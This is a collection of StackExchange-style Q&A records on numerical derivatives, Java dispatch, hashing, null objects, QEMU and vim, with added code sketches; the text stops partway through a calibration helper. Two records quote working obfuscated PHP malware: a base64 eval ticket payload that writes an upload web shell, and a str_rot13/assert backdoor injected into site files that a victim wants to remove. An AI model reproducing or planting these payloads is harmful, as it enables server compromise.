_scicomp.7833 | I need to evaluate the following derivative:$$\frac{1}{\prod_i \xi_i!}\frac{1}{\prod_j \eta_j!}\left.\frac{\partial^{\xi_1 + \cdots + \xi_m}}{\partial\alpha_1^{\xi_1}\ldots\partial\alpha_m^{\xi_m}}\frac{\partial^{\eta_1 + \cdots + \eta_n}}{\partial\beta_1^{\eta_1}\ldots\partial\beta_n^{\eta_n}}\exp\left(\sum_{ij} a_{ij} \alpha_i \beta_j\right)\right|_{\alpha_1 = \cdots = \alpha_m = \beta_1 = \cdots = \beta_n = 0}$$where the $\xi_i$ and $\eta_j$ are non-negative integers, with $i = 1...m$ and $j = 1...n$, and the $a_{ij}$ are non-negative real numbers.Is there a good numerical algorithm to do this? Is it efficient?(See also: https://math.stackexchange.com/a/430925/10063) | Numerical evaluation of partial derivatives | algorithms | null |
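Before attacking this numerically, it may help that the quantity has an exact combinatorial form (my own derivation from the factorization of the exponential — worth double-checking). Writing $\exp\big(\sum_{ij} a_{ij}\alpha_i\beta_j\big)=\prod_{ij}\sum_{k_{ij}\ge 0}(a_{ij}\alpha_i\beta_j)^{k_{ij}}/k_{ij}!$, the normalized derivative at $0$ is just the coefficient of $\prod_i\alpha_i^{\xi_i}\prod_j\beta_j^{\eta_j}$:

```latex
\frac{1}{\prod_i \xi_i!\,\prod_j \eta_j!}
\left.\frac{\partial^{\xi_1+\cdots+\xi_m}}{\partial\alpha_1^{\xi_1}\cdots\partial\alpha_m^{\xi_m}}
\frac{\partial^{\eta_1+\cdots+\eta_n}}{\partial\beta_1^{\eta_1}\cdots\partial\beta_n^{\eta_n}}
\exp\Big(\sum_{ij} a_{ij}\alpha_i\beta_j\Big)\right|_{\alpha=\beta=0}
= \sum_{\substack{k_{ij}\ge 0\\ \sum_j k_{ij}=\xi_i,\ \sum_i k_{ij}=\eta_j}}
\;\prod_{i,j}\frac{a_{ij}^{k_{ij}}}{k_{ij}!}
```

That is, a sum over non-negative integer matrices with row sums $\xi_i$ and column sums $\eta_j$; for small $\xi,\eta$ these matrices can be enumerated directly, avoiding numerical differentiation altogether.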
_codereview.116967 | Type erasure is giving me nuts recently. I'm designing a class that performs symbolic differentiation on a math expression represented as a binary expression tree. The question is more on the design part than on the actual code part so I'm only giving out the method that looks awful to me.public Node derive(final Node currentNode, Node parentNode) { Node dxNode = null; final Object cDataContext = currentNode.getData(); if (Number.class.isAssignableFrom(cDataContext.getClass())) dxNode = new TreeNode<Double>(0.0); else if (AddOperator.class.isAssignableFrom(cDataContext.getClass())) dxNode = deriveAddContext((Node<AddOperator>) currentNode); else if (MulOperator.class.isAssignableFrom(cDataContext.getClass())) dxNode = deriveMulContext((Node<MulOperator>) currentNode); else if (SineFunction.class.isAssignableFrom(cDataContext.getClass())) dxNode = deriveSineContext((Node<SineFunction>) currentNode); if (dxNode != null && parentNode != null) dxNode.setParent(parentNode); return dxNode;}I think it already speaks for itself. I'm having methods with different names which is fine. The awful part at least for me is this huge if statement that I truncated for simplicity. Is there a better way of doing this? I mean I would love to live with dynamic dispatch having the whole derive method consisting of a simple:Node dxNode = deriveNode(currentNode);dxNode.setParent(parentNode);return dxNode;I guess Java won't give me this luxury so perhaps there is some design pattern that I can utilize here? 
Just to give you a better understanding of the algorithm I'll show a sample method:private Node<AddOperator> deriveAddContext(final Node<AddOperator> additionContext) { // d/dx [f(x) + g(x)] = d/dx [f(x)] + d/dx [g(x)] => d/dx [f(x)] d/dx [g(x)] + // ROOT: ADD Node<AddOperator> dRoot = new TreeNode<AddOperator>(new AddOperator()); // ROOT.LEFT: d/dx [f(x)] dRoot.setLeft(derive(additionContext.getLeft(), dRoot)); // ROOT.RIGHT: d/dx [g(x)] dRoot.setRight(derive(additionContext.getRight(), dRoot)); // RET: d/dx return dRoot;}So the whole algorithm is recursive on the expression traversing the original expr in an inorder fashion.A Node has the following structure: dataField: <DataType> leftChild: Node rightChild: Node parent: Node | Dynamic Dispatch replacement for Generic methods | java;object oriented;design patterns | Personally, I would be able to live with your huge if statement if it remains straightforward, is well tested, and hidden in a nice class. I think a parser will often have these types of structures, especially if you are generating it from a grammar using a tool (like ANTLR for example) instead of coding it by hand.You could slightly improve the huge if statement by factoring out currentNode.getData().getClass() (instead of currentNode.getData()):final Class<?> dataClass = currentNode.getData().getClass();if (Number.class.isAssignableFrom(dataClass)) dxNode = new TreeNode<Double>(0.0);else if (AddOperator.class.isAssignableFrom(dataClass)) dxNode = deriveAddContext((Node<AddOperator>) currentNode);else if (MulOperator.class.isAssignableFrom(dataClass)) dxNode = deriveMulContext((Node<MulOperator>) currentNode);else if (SineFunction.class.isAssignableFrom(dataClass)) dxNode = deriveSineContext((Node<SineFunction>) currentNode);You could also consider using Java 8 to create an explicit mapping between the class the current node (data) is assignable from and the initialization code for dxNode using lambda expressions. 
This has the advantage that you should be able to extend the expression types by adding a single line to the map:public Node deriveAlternative(final Node currentNode, final Node parentNode) { Node dxNode = null; final Map<Class<?>, Function<Node, Node>> deriveMap = new HashMap<>(); deriveMap.put(Number.class, n -> new TreeNode<Double>(0.0)); deriveMap.put(AddOperator.class, n -> deriveAddContext((Node<AddOperator>) n)); deriveMap.put(MulOperator.class, n -> deriveMulContext((Node<MulOperator>) n)); deriveMap.put(SineFunction.class, n -> deriveSineContext((Node<SineFunction>) n)); final Optional<Class<?>> optionalKey = deriveMap.keySet().stream() .filter(key -> key.isAssignableFrom(currentNode.getData().getClass())) .findFirst(); if (optionalKey.isPresent()) { final Class<?> key = optionalKey.get(); dxNode = deriveMap.get(key).apply(currentNode); } if (dxNode != null && parentNode != null) dxNode.setParent(parentNode); return dxNode;} |
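The map-based dispatch in this answer is language-agnostic; in a dynamic language the whole pattern collapses to a dict keyed by node type. A rough Python sketch of the same idea (the class names and derivative rules here are illustrative, not the asker's actual API):

```python
class Num:
    def __init__(self, value): self.value = value

class Var:  # the variable being differentiated against
    pass

class Add:
    def __init__(self, left, right): self.left, self.right = left, right

class Mul:
    def __init__(self, left, right): self.left, self.right = left, right

# The dict plays the role of the Java Map<Class<?>, Function<Node, Node>>.
DERIVE = {
    Num: lambda n: Num(0),                             # d/dx c = 0
    Var: lambda n: Num(1),                             # d/dx x = 1
    Add: lambda n: Add(derive(n.left), derive(n.right)),
    Mul: lambda n: Add(Mul(derive(n.left), n.right),   # product rule
                       Mul(n.left, derive(n.right))),
}

def derive(node):
    return DERIVE[type(node)](node)
```

A lookup failure surfaces as a KeyError, playing roughly the role of the null dxNode in the original method.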
_webmaster.26523 | I have WHMCS and I use it with no problem for my hosting purposes.Almost every 2 or 3 days, I can see a spam with malicious content submitted as a new ticket that tries to hack.The last one was:Subject:{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})Message:{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg 
wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

What are these attacks? Why don't they use any other way to attack?!!! In my opinion it is obvious that a system like WHMCS will never be hacked by such poor attempts. They should, of course, have used functions like strip_tags and mysql_real_escape_string and other security functions. Would anybody explain why they always select such a poor way to attack? Don't they really know that WHMCS is stronger than these low-level hacks? In fact I'd like to know: Do these efforts differ from each other? Can they be serious? Should I be scared of these attempts? | Should WHMCS hacking attempts that never succeed be important to me? | php;server;security;hacking | It's a robot scanning the web for WHMCS installs that are vulnerable to this attack; it's just part and parcel of running a website.
_unix.322912 | I have a server with thousands of files containing a multi-line pattern that I want to globally find & replace. Here's a sample of the pattern:<div class=fusion-header-sticky-height></div><div class=fusion-header> <div class=fusion-row> <?php avada_logo(); ?> <?php avada_main_menu(); ?> </div></div><?php//###=CACHE START=###@error_reporting(E_ALL);@ini_set(error_log,NULL);@ini_set(log_errors,0);@ini_set(display_errors, 0);@error_reporting(0);$wa = ASSERT_WARNING;@assert_options(ASSERT_ACTIVE, 1);@assert_options($wa, 0);@assert_options(ASSERT_QUIET_EVAL, 1);$strings = as; $strings .= se; $strings .= rt; $strings2 = st; $strings2 .= r_r; $strings2 .= ot13; $gbz = riny(.$strings2(base64_decode);$light = $strings2($gbz.'(nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8ioT9uMUIjMTS0MKZhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMcCGRznQ0vYz1xAFtvZwSxLGVkAwqzBJEvBTSwAwV4ZwLkMGp3AQyvLJH1ZwDkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwqKWfYPOQIIWZG1OHK0ACGx5SD1EHFH1SG1IHYPN1XGftL3IloS9mMKEipUDbWTA1pzjfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1WSHIISH1EoVaNvKFxcVQ09VPVkAwN0MwH5ZmxjZwp3ZGVlBGp1BJDjMQHkAGyzA2HkLvVcVUftMKMuoPumqUWcpUAfLKAbMKZbWS9FEISIEIAHJlWwVy0cXGftsDcyL2uiVPEcLaL7PtxWPK0tsD==));'); $strings($light);//###=CACHE END=###?>I've tried various methods to find and replace this string 
but its multiline nature has got me stumped. I've looked around extensively (over a day of searching) and the solutions I've found can't handle the multi-line nature of this.Any assistance would be most welcome.UPDATEI've got a solution now, largely thanks to the accepted answer. Others facing something similar should look at my github project for this. | Global multiline search & replace | sed;grep;filesystems;php;malware | If you want to edit text defined by a context-free language (nested matching begin and end tags, e.g. HTML or XML), you should use a tool made for that instead of a tool for regular expressions. Such a tool is for example sgrep (available as a package for many linux distros): You can match (nested) regions defined by beginning and ending tags, and manipulate them. So for examplesgrep -o '%r\n' '(start .. end) extracting (<?php..?> containing ###=CACHE START=###)'will remove any region starting with <?php and ending with ?> that contains ###=CACHE START=### from your file, by printing all other regions separated by a newline. Newlines and white space are not considered relevant for matching, so multiline matches are for free. |
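If sgrep is not available, the CACHE markers also make the job tractable for any tool with multiline regular expressions. A hedged Python sketch (the sample text and the exact marker regex are illustrative; always test on copies before touching thousands of files):

```python
import re

# Non-greedy match from the opening <?php through the END marker's closing ?>;
# re.DOTALL lets .*? span newlines, so the whole injected block is one match.
MALWARE = re.compile(
    r"<\?php\s*//###=CACHE START=###.*?//###=CACHE END=###\s*\?>",
    re.DOTALL,
)

def clean(text):
    """Remove every injected <?php ... ?> block delimited by the CACHE markers."""
    return MALWARE.sub("", text)

sample = (
    "<div>ok</div>\n"
    "<?php\n//###=CACHE START=###\nevil();\n//###=CACHE END=###\n?>\n"
    "rest"
)
print(clean(sample))
```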
_cs.31998 | I am doing an exercise from a Big Data course I'm taking on Coursera (this exercise is for experimenting with a big-data problem and is not for any credit or homework); the assignment was described briefly: Your task is to quickly find the number of pairs of sentences that are at word-level edit distance at most 1. Two sentences S1 and S2 are at edit distance 1 if S1 can be transformed to S2 by: adding, removing or substituting a single word. I am then given a large txt file that contains about $10^6$ sentences. The way I tried to attack this problem: Observation $1$: If the lengths of two sentences differ by more than $1$, then they are not at edit distance $1$. Observation $2$: Let $A_1,...,A_5$ be five consecutive words from a sentence, and let $B_1,...,B_5$ be another five consecutive words chosen from different indexes (that is, if we label the words of a sentence, then $B_i$ and $A_j$ do not share an index). Five is a small, arbitrary number I chose. I used something like a curried syntax to get a hashtable that keeps a 3-tuple: $(X,Y,Z)$, where I mapped each sentence as follows: $X$ is the number of words the sentence has. $Y$ is obtained by a hash function on the content of the words (I will soon describe this hash function). $Z$ is a list of integers containing the index of the line in the document [the line number] that was mapped to $(X,Y)$. In C# this corresponds to an object of type Dictionary<int, Dictionary<int, List<int>>>. So I kept two hashtables of the above form, where I took the first five words to hash and get $Y$, and words $6-10$ to hash and get another value of $Y$. Then, given a sentence, I compute the two $Y$ values it would have gotten and look at buckets whose length differs by at most $1$ from this sentence's length and which share one $Y$ value with this sentence. Let me describe the hashing function I used to get $Y$: I took the $A_i$ (similarly with the $B_i$) and concatenated them. I looked at this string as a byte array (that is, by the bits
it takes to represent the numbers). I then applied the SHA-1 hash function to it (there are no security reasons for this, but I wanted something that hashes well). I took the last $4$ bytes of the SHA-1 hash and looked at them as a positive integer (by looking at the last $32$ bits, considering them as an integer, and then applying the absolute value function). Call this result $R$. $Y= R\%p^{2}$, where $p$ was chosen as follows: I counted how many lines of a given length $l$ appear (say $n_l$); for lines of length $l$ I chose $p$ s.t. $$\frac{n_l}{p^2}\leq 3$$ The following is a histogram showing $n_l$ as a function of $l$, which should give some indication of the values chosen for $p$. However, there are too many collisions: I get about $6$ elements in each bucket. I took one example of such a bucket and printed those sentences (I hoped they were similar, so they would have a good reason to be mapped to the same bucket), but they are very different from one another. This is a screenshot of those sentences printed to the console. Question: Why do I get a large number of collisions? ($6$ on average over the $10^5$ buckets I considered, whereas with an even distribution I would expect $3$ from the choice of $p$; some buckets have a few tens of elements in them.) Could the problem be that I used modulo a square of a prime and not a prime? Is it that significant? | Hashing by doing modulo $m$ for $m=p^2$ for a prime $p$ instead of using a prime $m$ - is it that bad? | hash;big data | null
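To make the scheme above concrete, here is a small Python sketch of the bucket key as described (SHA-1 of the concatenated words, last 4 bytes read as a signed integer, absolute value, then reduced mod $p^2$; the words and the value of $p$ are illustrative):

```python
import hashlib

def bucket_key(words, p):
    """Hash a window of words exactly as described in the question above."""
    digest = hashlib.sha1(" ".join(words).encode()).digest()
    # last 4 bytes as a signed 32-bit integer, then absolute value
    r = abs(int.from_bytes(digest[-4:], "big", signed=True))
    return r % (p * p)  # the mod-p^2 step being questioned

p = 97  # illustrative prime for one sentence-length class
y = bucket_key(["the", "quick", "brown", "fox", "jumps"], p)
print(y)
```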
_softwareengineering.318730 | I have a couple of simple classes that implement the Null Object pattern. To illustrate the hierarchy, let's define a Config interface with two classes implementing it, ConfigItem and MissingConfig, each defined in its own file.

// Config.java
public interface Config {
    Something process();
}

// ConfigItem.java
public class ConfigItem implements Config {
    // some fields
    @Override
    public Something process() {
        // some actual logic and return statement
    }
}

// MissingConfig.java
public enum MissingConfig implements Config {
    INSTANCE;
    @Override
    public Something process() {
        // do no harm
    }
}

In my case, the MissingConfig object is immutable and only a single instance is guaranteed to exist. This works fine and allows me to avoid null checks. However, the fact that this implementation of the Config interface exists can be missed by other developers working with the code. I'm trying to find a way to make the reusable null representation of Config easy to find. It occurred to me that I could expose it using the interface itself:

public interface Config {
    Something process();
    Config MISSING = MissingConfig.INSTANCE;
}

so that it would auto-complete for everyone trying to do something with Config. This, however, in a way introduces a constant in the interface, which is advised against in Joshua Bloch's Effective Java (Chapter 4, item 19). Another way to structure the code that occurred to me is to define the enum inside the interface:

public interface Config {
    Something process();
    public enum Missing implements Config {
        INSTANCE;
        @Override
        public Something process() {
            // do no harm
        }
    }
}

This looks almost as readable when consumed, Config.Missing.INSTANCE, but not as nice as the previous version... and technically, this is still a constant defined inside an interface. Just a bit more convoluted. Is there any way I can make the consumption of the null object blatantly obvious without violating the good practices of interface design...
or am I trying to have my cake and eat it too?I'm beginning to think my original implementation (with the enum defined in its own file) is the most elegant one and that the discoverability should be achieved by an explicit mention of it in the Javadoc. As much as I'd love to, I can't protect myself against people who don't read javadocs.I have also thought about switching from an interface to an abstract class but that limits reuse in ways I cannot accept due to single inheritance (some existing code that has to do with the Config)Hope this isn't too open-ended for Programmers | Discoverable default implementation of an interface | java;interfaces | There is a sentence in the chapter you referenced (Joshua Bloch's Effective Java (Chapter 4, item 19)):If the constants are strongly tied to an existing class or interface, you should add them to the class or interface.and you could rewrite your examples to:public interface Config { Config EMPTY = new Config() { @Override public void doSomething() { // empty for missing config } }; void doSomething();}but some JAVADOC could be helpful for your colleagues. |
_softwareengineering.355376 | Suppose I am writing a C++ library that I intend to distribute in binary form, with interfaces from other languages (e.g. Python). The 'easy' approach of just compiling the library and distributing the DLL or Framework does not work well. For it to work you need to compile the library with every supported compiler and every supported compiler option, and bad things can happen if you don't. The problem is that C++'s ABI is in general not stable, and the ABI of the STL is definitely not stable. A sort of solution is to stick to 'simple' C++ in your public API: simple classes with basic types. The problem with that is you don't get to use the STL's nice types like std::string and std::vector and end up reimplementing them. So I'm wondering if there is a better solution using a library Interface Definition Language (IDL). There are loads of these for network protocols, like Thrift, Protobuf, gRPC, CapnProto, etc. Is there one for libraries? The ideal solution would then take this IDL file and generate a C wrapper around the C++ library, so that its ABI is now the C ABI. It could then also generate open-source wrappers around the C library for whatever language you wanted (including C++). I know it is kind of insane to wrap C++ with a C API and then wrap that with a C++ API. But I can't see a better way. Does this exist? Is it insane? Is there a better way? | Is there an interface definition language for software libraries? | c++;libraries;abi | null
_webmaster.61101 | Google Webmaster Tools is showing keywords such as "cookies" in my keyword list. This is probably because we have links to our long legal disclaimer on cookies. We're a B2B service, so clearly I don't want my site to rank for "cookies". What's the best practice for dealing with this? Should I remove the domain.com/cookies subdirectory from Google Webmaster Tools? | How to deal with non-relevant keywords in Google Webmaster Tools | seo;google search console;keywords;googlebot | null
_webmaster.17980 | I run a forum which serves its pages as XHTML+MathML+SVG; in full:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus MathML 2.0 plus SVG 1.1//EN" "http://www.w3.org/2002/04/xhtml-math-svg/xhtml-math-svg-flat.dtd">

Using the MathPlayer plugin, Internet Explorer users can use this site. However, sometimes someone is using the forum from IE and isn't able to install MathPlayer (maybe they're on a public machine somewhere). Then IE (at least 6 & 7) complains about the XHTML and offers just to download the file. I read on the W3C site how to get around this using an XSL transformation (http://www.w3.org/MarkUp/2004/xhtml-faq#ie). When I put this in place, I found that Chrome was now complaining vociferously about undefined entities (the specific one was &nbsp; but testing shows that that's not relevant). Bizarrely, I can get round this by manually declaring the entities in the DOCTYPE:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus MathML 2.0 plus SVG 1.1//EN" "http://www.w3.org/2002/04/xhtml-math-svg/xhtml-math-svg-flat.dtd" [<!ENTITY nbsp " ">]>

but I'd rather not do this for the whole gamut of possible entities. I say bizarrely because the XHTML+MathML+SVG DTD does, as far as I can see, declare these entities. So somehow these are getting missed out. Is there a way around this problem? Can I serve XHTML-with-entities to IE? In case it matters, the pages are generated by a PHP script and served via Apache, so if there's a reliable method of sniffing the browser and modifying the start of the document (so only sending the <?xml-stylesheet ...> bit to IE) then that would be an acceptable alternative. (I hope I have the right SE site ... please let me know if I'm in the wrong place. Ditto with the tags.)
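Along the lines of the last paragraph, the browser-sniffing fallback can be kept very small. A Python sketch of the idea (the stylesheet name and the MSIE substring check are assumptions for illustration; the original site would do this in PHP):

```python
# Processing instruction prepended only for IE, triggering the XSL workaround.
XSL_PI = '<?xml-stylesheet type="text/xsl" href="copy.xsl"?>'

def document_preamble(user_agent):
    """Send the XSL-transformation trick only to IE; others get plain XHTML."""
    if "MSIE" in user_agent:
        return XSL_PI + "\n"
    return ""
```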
_unix.114264 | In the Linux CLI I can press Ctrl-R to do a reverse search and easily pick something I have done before. Is there something similar in vim? I mean, I may run a command using : (it could be anything, like a long substitution) and if I need to do it again I have to retype it. Is there a way to avoid retyping, and instead somehow search back and execute it? | Is there a command reverse search in vim? | vim;search | You may find q: useful. It opens the command-line window. The command-line window looks like this: I tried to make an animation of its usage: Also see c_CTRL-F, which opens the command-line window from command-line mode.
_cs.65953 | I came across the following excerpts while reading about regular expression identities: The regex associative laws are: $$(L+M)+N=L+(M+N)$$ $$(LM)N=L(MN)$$ Some important implications of the associative laws are: $$r(sr)^*=(rs)^*r$$ $$(rs+r)^*r=r(sr+r)^*$$ $$s(rs+s)^*r=(sr+s)^*sr$$ $$(LM)^*N^*\neq L^*(MN)^*$$ The issue is that I don't find the implications as intuitive as the identities themselves. How can I understand the implications intuitively? I can always form a string belonging to the left-hand-side regex and check whether it is accepted by the other regex. The first implication is very simple to test this way. However, how can I make them more intuitive? Are these implications simply made-up expressions which have been rigorously tested to hold true, without any specific significance, since we can form many such expressions? I am unable to get the point of stating these implications. I can't think of any problem in which I could use these regexes immediately. It may be because I am not able to get the intuition behind these implications, so that it would strike me immediately when to use them. | Meaning / proof of these regex identities | regular expressions | For all three of your statements, the answer is that, generally speaking, the implications simply aren't as intuitive as, say, the associative laws. Look at the analogous problem with algebraic expressions: we have associative laws for addition and multiplication and we also have a distributive law that states that for any expressions $p,q,r$ we have $$p\cdot(q+r)=(p\cdot q)+(p\cdot r)$$ Eventually, these rules should be intuitively obvious. However, one implication of these rules, that $$(p+q)^3=p^3+3p^2q+3pq^2+q^3$$ is probably not as intuitively obvious as the rules used to derive that identity.
The utility of the result above is that it can be used as a tool to simplify other, more complicated problems. It's the same for regular expressions: the fact that, say, $r(sr)^*=(rs)^*r$, is correct can be proven rigorously, but having done that you can use it as a tool to show that $$aa+(aab)^*aa=aa+aa(baa)^*=aa(\epsilon+(baa)^*)$$ should you ever need to. For example, there is a handy technique, involving what's known as Arden's lemma, that can be used to produce a regular expression describing the language accepted by a finite automaton. Depending on how it's applied, this can produce several regular expressions from the same FA, so it might fall to you to show that the expressions are indeed equivalent, in which case the implications you listed might be handy. The upshot (here's the tl;dr part) is that the implications you mentioned are simply tools you can use when needed: they've been proven to hold, but there's no reason why they should be intuitively obvious.
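Beyond spot-checking single strings, such identities can also be sanity-checked mechanically: compare two expressions on every string up to a bounded length. A Python sketch (a finite check builds confidence but is, of course, not a proof):

```python
import re
from itertools import product

def agree(p1, p2, alphabet="ab", max_len=6):
    """True iff both patterns accept exactly the same strings up to max_len."""
    for n in range(max_len + 1):
        for letters in product(alphabet, repeat=n):
            w = "".join(letters)
            if bool(re.fullmatch(p1, w)) != bool(re.fullmatch(p2, w)):
                return False
    return True

# First implication, instantiated with r=a, s=b: r(sr)* = (rs)*r
print(agree("a(ba)*", "(ab)*a"))
# The inequality (LM)^*N^* != L^*(MN)^*, with L=a, M=b, N=c
print(agree("(ab)*c*", "a*(bc)*", alphabet="abc"))
```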
_unix.175289 | I want to install Windows 10 64-bit, but my current version of Windows is 32-bit, so it is unable to run the setup.exe file. So I booted into Ubuntu 14.10 64-bit and installed QEMU to use my current hard disk as a virtual hard disk and the ISO as a CD-ROM. This is the command I use:

sudo qemu-system-x86_64 -cpu qemu64 -vga std -cdrom file=~/WindowsTechnicalPreview-x64-EN-US.iso -boot d -drive /dev/sda1

But this gives me an error:

qemu-system-x86_64: -cdrom file=/home/ubuntu/WindowsTechnicalPreview-x64-EN-US.iso: could not open disk image file=/home/ubuntu/WindowsTechnicalPreview-x64-EN-US.iso: Could not open 'file=/home/ubuntu/WindowsTechnicalPreview-x64-EN-US.iso': No such file or directory

But I have checked that the file exists. | Getting an error in QEMU: No such file or directory | qemu | -cdrom SOMEFILE is a shortcut for -drive index=2,media=cdrom,file=SOMEFILE. Either use the verbose -drive option or the -cdrom shortcut, don't mix them up. You've told QEMU to open a file called file=/home/ubuntu/WindowsTechnicalPreview-x64-EN-US.iso, and this file doesn't exist.
_webapps.91905 | How do I import saved images from http://www.google.com/save/ into Google Photos without downloading them? (From Linux.) Similar to, but different from: How to download all Google Search images results | export saved Google images into Google photos | images;google photos;online storage;google image search;cloud | null
_unix.174323 | I have an Ubuntu machine. I am connected to it remotely and am getting the following error:

mkdir: cannot create directory `/testFolder': Read-only file system

Like Windows, rebooting the machine solved this error. Can someone explain this behaviour to me? I am a bit surprised. | Read-only file system error while accessing the files on Ubuntu | ubuntu;filesystems;readonly | null
_unix.315239 | I have a string like $number = 1234567; and I want to extract a substring out of it, but I am not getting proper results with the substr function. If I execute substr $number, 0, 1; I get 1 as output, but it should be 12. | best way to find substring of integer number in perl | perl;string | To get 12, you need:

substr $number, 0, 2

The syntax for substr is:

substr $var, OFFSET, LENGTH

So when you do:

substr $number, 0, 1

the OFFSET will be 0 and the LENGTH will be 1. perl is zero-indexed, i.e. the indexing starts at 0, and the length of the substring you have picked is 1, so, as expected, you only get 1 in the output.
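For readers coming from other languages, the same offset/length logic maps directly onto zero-based slicing; a Python analogue for comparison (illustrative, not Perl):

```python
number = "1234567"

def substr(s, offset, length):
    """Mimic Perl's three-argument substr: zero-based offset, then length."""
    return s[offset:offset + length]

print(substr(number, 0, 2))  # the two-character prefix
```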
_unix.227098 | I've been writing a Linux device driver for some measurement devices I'm attaching to my Raspberry Pi. I've created my kernel module and an application to access the character device driver, but the device needs to be calibrated regularly and I need to store the calibration data somewhere. Where is that data usually stored? My best guess is /etc, but I'd like to hear from someone who knows more about this than I do. | Where to store calibration files for a custom Linux device driver | drivers;directory structure | Per the Filesystem Hierarchy Standard, /var/lib/ might be the right place:This hierarchy holds state information pertaining to an application or the system. State information is data that programs modify while they run, and that pertains to one specific host. Users must never need to modify files in /var/lib to configure a package's operation.State information is generally used to preserve the condition of an application (or a group of inter-related applications) between invocations and between different instances of the same application. State information should generally remain valid after a reboot, should not be logging output, and should not be spooled data./etc isn't right for calibration data, since /etc should be able to be mounted read-only. |
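As a concrete illustration of the /var/lib convention, a hedged Python sketch of a userspace helper that persists calibration state (the directory name and the JSON format are assumptions for illustration, not part of the driver in question):

```python
import json
from pathlib import Path

# Illustrative location; a real package would own and create this directory.
CAL_DIR = Path("/var/lib/mydriver")

def save_calibration(cal, base=CAL_DIR):
    """Persist a calibration dict so it survives reboots, per the FHS."""
    base.mkdir(parents=True, exist_ok=True)
    (base / "calibration.json").write_text(json.dumps(cal, indent=2))

def load_calibration(base=CAL_DIR, default=None):
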